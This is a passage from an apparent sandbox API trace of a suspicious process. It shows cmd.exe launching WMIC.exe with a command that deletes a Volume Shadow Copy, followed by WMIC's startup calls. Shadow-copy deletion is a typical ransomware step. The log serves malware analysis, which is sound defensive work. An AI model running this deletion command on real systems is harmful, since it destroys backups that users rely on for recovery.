lpLCData=":") returned 2 [0098.490] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="0") returned 2 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="0") returned 2 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfae0, cchData=128 | out: lpLCData="1") returned 2 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab2a740, cchData=8 | out: lpLCData="/") returned 2 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab2a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab2a460, cchData=32 | out: lpLCData="Tue") returned 4 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab2a420, cchData=32 | out: lpLCData="Wed") returned 4 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab2a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab2a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab2a360, cchData=32 | out: lpLCData="Sat") returned 4 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab2a700, cchData=32 | out: lpLCData="Sun") returned 4 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab17b40, cchData=8 | out: lpLCData=".") returned 2 [0098.491] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab2a4e0, cchData=8 | out: lpLCData=",") returned 2 [0098.491] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0098.492] GetProcessHeap () returned 0x240000 [0098.492] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x20c) returned 0x2597e0 [0098.492] GetConsoleTitleW (in: lpConsoleTitle=0x2597e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.492] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0098.492] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0098.492] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0098.492] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0098.493] GetProcessHeap () returned 0x240000 [0098.493] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4012) returned 0x25ce50 [0098.493] GetProcessHeap () returned 0x240000 [0098.493] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ce50 | out: hHeap=0x240000) returned 1 [0098.495] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0098.495] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0098.495] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0098.495] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0098.495] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0098.495] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0098.495] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0098.495] GetProcessHeap () returned 0x240000 [0098.495] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0) returned 0x259a00 [0098.495] GetProcessHeap () returned 0x240000 [0098.495] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x259ac0 [0098.498] GetProcessHeap () returned 0x240000 [0098.498] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x9e) returned 0x259b20 [0098.499] GetConsoleTitleW (in: lpConsoleTitle=0x1cf9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.499] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.499] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf580, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf560, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf560*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0098.499] GetProcessHeap () returned 0x240000 [0098.499] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x218) returned 0x259bd0 [0098.499] GetProcessHeap () returned 0x240000 [0098.499] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe2) returned 0x259df0 [0098.499] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0098.499] GetProcessHeap () returned 0x240000 [0098.499] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x420) returned 0x241320 [0098.499] SetErrorMode (uMode=0x0) returned 0x8001 [0098.500] SetErrorMode (uMode=0x1) returned 0x0 [0098.500] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x241330, lpFilePart=0x1cf280 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x1cf280*="wbem") returned 0x18 [0098.500] SetErrorMode (uMode=0x8001) returned 0x1 [0098.500] GetProcessHeap () returned 0x240000 [0098.500] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x241320, Size=0x54) returned 0x241320 [0098.500] GetProcessHeap () returned 0x240000 [0098.500] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x241320) returned 0x54 [0098.500] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0098.500] GetProcessHeap () returned 0x240000 [0098.500] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x259ee0 [0098.500] GetProcessHeap () returned 0x240000 [0098.500] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x7c) returned 0x259f30 [0098.500] GetProcessHeap () returned 0x240000 [0098.500] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x259f30, Size=0x48) returned 0x259f30 [0098.500] GetProcessHeap () returned 0x240000 [0098.500] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x259f30) returned 0x48 [0098.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab0f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0098.500] GetProcessHeap () returned 0x240000 [0098.500] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe8) returned 0x259f90 [0098.504] GetProcessHeap () returned 0x240000 [0098.504] RtlReAllocateHeap (Heap=0x240000, Flags=0x0, Ptr=0x259f90, Size=0x7e) returned 0x259f90 [0098.504] GetProcessHeap () returned 0x240000 [0098.504] RtlSizeHeap (HeapHandle=0x240000, Flags=0x0, MemoryPointer=0x259f90) returned 0x7e [0098.505] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0098.505] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x1ceff0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ceff0) returned 0x25a020 [0098.505] GetProcessHeap () returned 0x240000 [0098.505] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x28) returned 0x2546c0 [0098.505] FindClose (in: hFindFile=0x25a020 | out: hFindFile=0x25a020) returned 1 [0098.505] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0098.505] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0098.505] GetConsoleTitleW (in: lpConsoleTitle=0x1cf540, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0098.506] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf2f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf2b8 | out: lpAttributeList=0x1cf2f8, lpSize=0x1cf2b8) returned 1 [0098.506] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf2f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf2a8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf2f8, lpPreviousValue=0x0) returned 1 [0098.506] GetStartupInfoW (in: lpStartupInfo=0x1cf410 | out: lpStartupInfo=0x1cf410*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0098.506] GetProcessHeap () returned 0x240000 [0098.506] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x20) returned 0x2546f0 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.506] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0098.507] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0098.507] GetProcessHeap () returned 0x240000 [0098.507] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2546f0 | out: hHeap=0x240000) returned 1 [0098.507] GetProcessHeap () returned 0x240000 [0098.507] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x12) returned 0x258a30 [0098.507] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0098.508] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x1cf330*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf2e0 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete", lpProcessInformation=0x1cf2e0*(hProcess=0x54, hThread=0x50, dwProcessId=0xa10, dwThreadId=0x90c)) returned 1 [0098.511] CloseHandle (hObject=0x50) returned 1 [0098.511] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0098.511] GetProcessHeap () returned 0x240000 [0098.511] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25c360 | out: hHeap=0x240000) returned 1 [0098.512] GetEnvironmentStringsW () returned 0x25ad60* [0098.512] GetProcessHeap () returned 0x240000 [0098.512] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xae8) returned 0x25b850 [0098.512] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0098.512] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0099.949] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1cf228 | out: lpExitCode=0x1cf228*=0x0) returned 1 [0099.950] CloseHandle (hObject=0x54) returned 1 [0099.950] _vsnwprintf (in: _Buffer=0x1cf498, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf238 | out: _Buffer="00000000") returned 8 [0099.950] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0099.950] GetProcessHeap () returned 0x240000 [0099.950] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b850 | out: hHeap=0x240000) returned 1 [0099.950] GetEnvironmentStringsW () returned 0x25ad60* [0099.950] GetProcessHeap () returned 0x240000 [0099.950] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0e) returned 0x25b880 [0099.950] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0099.950] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0099.950] GetProcessHeap () returned 0x240000 [0099.950] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b880 | out: hHeap=0x240000) returned 1 [0099.950] GetEnvironmentStringsW () returned 0x25ad60* [0099.950] GetProcessHeap () returned 0x240000 [0099.950] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xb0e) returned 0x25b880 [0099.950] FreeEnvironmentStringsW (penv=0x25ad60) returned 1 [0099.950] GetProcessHeap () returned 0x240000 [0099.950] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x258a30 | out: hHeap=0x240000) returned 1 [0099.950] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf2f8 | out: lpAttributeList=0x1cf2f8) [0099.950] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.950] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0099.951] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.951] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ab0e194 | out: lpMode=0x4ab0e194) returned 1 [0099.951] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.951] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab0e198 | out: lpMode=0x4ab0e198) returned 1 [0099.951] SetConsoleInputExeNameW () returned 0x1 [0099.951] GetConsoleOutputCP () returned 0x1b5 [0099.951] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab1bfe0 | out: lpCPInfo=0x4ab1bfe0) returned 1 [0099.951] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.951] exit (_Code=0) Process: id = "23" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x1a0f0000" os_pid = "0xa10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0x644" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{05121166-67F2-4EA9-83D8-EDC08F680DA7}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 158 os_tid = 0x90c [0098.548] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f830 | out: lpSystemTimeAsFileTime=0x18f830*(dwLowDateTime=0x4254d350, dwHighDateTime=0x1d68245)) [0098.549] GetCurrentProcessId () returned 0xa10 [0098.549] GetCurrentThreadId () returned 0x90c [0098.549] GetTickCount () returned 0x114e5ae [0098.549] QueryPerformanceCounter (in: lpPerformanceCount=0x18f838 | out: lpPerformanceCount=0x18f838*=21844176241) returned 1 [0098.551] GetModuleHandleW (lpModuleName=0x0) returned 0xff1d0000 [0098.551] __set_app_type (_Type=0x1) [0098.551] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff21ced0) returned 0x0 [0098.551] __wgetmainargs (in: _Argc=0xff242380, _Argv=0xff242390, _Env=0xff242388, _DoWildCard=0, _StartInfo=0xff24239c | out: _Argc=0xff242380, _Argv=0xff242390, _Env=0xff242388) returned 0 [0098.551] ??0CHString@@QEAA@XZ () returned 0xff242ab0 [0098.551] malloc (_Size=0x30) returned 0x245a50 [0098.551] malloc (_Size=0x70) returned 0x245a90 [0098.551] malloc (_Size=0x50) returned 0x247d30 [0098.551] malloc (_Size=0x30) returned 0x247d90 [0098.551] malloc (_Size=0x48) returned 0x247dd0 [0098.551] malloc (_Size=0x30) returned 0x247e20 [0098.552] malloc (_Size=0x30) returned 0x247e60 [0098.552] ??0CHString@@QEAA@XZ () returned 0xff242f58 [0098.552] malloc (_Size=0x30) returned 0x247ea0 [0098.552] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0098.552] SetConsoleCtrlHandler (HandlerRoutine=0xff215724, Add=1) returned 1 [0098.552] _onexit (_Func=0xff22f378) returned 0xff22f378 [0098.552] _onexit (_Func=0xff22f490) returned 0xff22f490 [0098.552] _onexit (_Func=0xff22f4d0) returned 0xff22f4d0 [0098.552] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.552] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0098.555] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0098.561] CoCreateInstance (in: rclsid=0xff1d73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1d7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff242940 | out: ppv=0xff242940*=0x1ee1390) returned 0x0 [0098.567] GetCurrentProcess () returned 0xffffffffffffffff [0098.567] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x18f600 | out: TokenHandle=0x18f600*=0xf4) returned 1 [0098.567] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f5f8 | out: TokenInformation=0x0, ReturnLength=0x18f5f8) returned 0 [0098.568] malloc (_Size=0x118) returned 0x2469a0 [0098.568] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x2469a0, TokenInformationLength=0x118, ReturnLength=0x18f5f8 | out: TokenInformation=0x2469a0, ReturnLength=0x18f5f8) returned 1 [0098.568] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x2469a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=536839147, Attributes=0x7478), (Luid.LowPart=0x0, Luid.HighPart=2391776, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x53005c, Luid.HighPart=7536761, Attributes=0x650074), (Luid.LowPart=0x5c0032, Luid.HighPart=6422615, Attributes=0x6d0065))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0098.568] free (_Block=0x2469a0) [0098.568] CloseHandle (hObject=0xf4) returned 1 [0098.568] malloc (_Size=0x40) returned 0x247ee0 [0098.568] malloc (_Size=0x40) returned 0x247f30 [0098.568] malloc (_Size=0x40) returned 0x247f80 [0098.568] malloc (_Size=0x20a) returned 0x2469a0 [0098.568] GetSystemDirectoryW (in: lpBuffer=0x2469a0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0098.568] free (_Block=0x2469a0) [0098.568] malloc (_Size=0x18) returned 0x41dfb0 [0098.568] malloc (_Size=0x18) returned 0x2469a0 [0098.568] malloc (_Size=0x18) returned 0x2469c0 [0098.568] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0098.568] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0098.568] free (_Block=0x41dfb0) [0098.568] free (_Block=0x2469a0) [0098.568] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0098.569] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0098.569] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0098.569] FreeLibrary (hLibModule=0x77940000) returned 1 [0098.569] free (_Block=0x2469c0) [0098.569] _vsnwprintf (in: _Buffer=0x247f80, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x18f228 | out: _Buffer="ms_409") returned 6 [0098.569] malloc (_Size=0x20) returned 0x2469a0 [0098.569] GetComputerNameW (in: lpBuffer=0x2469a0, nSize=0x18f600 | out: lpBuffer="XDUWTFONO", nSize=0x18f600) returned 1 [0098.569] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.569] malloc (_Size=0x14) returned 0x41dfb0 [0098.569] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.570] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x18f5f8 | out: lpNameBuffer=0x0, nSize=0x18f5f8) returned 0x7fffffde000 [0098.570] GetLastError () returned 0xea [0098.570] malloc (_Size=0x40) returned 0x2469d0 [0098.570] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2469d0, nSize=0x18f5f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x18f5f8) returned 0x1 [0098.570] lstrlenW (lpString="") returned 0 [0098.571] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0098.571] lstrlenW (lpString=".") returned 1 [0098.571] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.571] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0098.572] lstrlenW (lpString="LOCALHOST") returned 9 [0098.572] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0098.572] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.572] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.572] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0098.572] free (_Block=0x41dfb0) [0098.572] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.572] malloc (_Size=0x14) returned 0x41dfb0 [0098.572] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.572] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.572] malloc (_Size=0x14) returned 0x246a20 [0098.572] lstrlenW (lpString="XDUWTFONO") returned 9 [0098.572] malloc (_Size=0x8) returned 0x246a40 [0098.572] malloc (_Size=0x18) returned 0x246a60 [0098.572] malloc (_Size=0x30) returned 0x246a80 [0098.572] malloc (_Size=0x18) returned 0x246ac0 [0098.572] SysStringLen (param_1="IDENTIFY") returned 0x8 [0098.572] SysStringLen 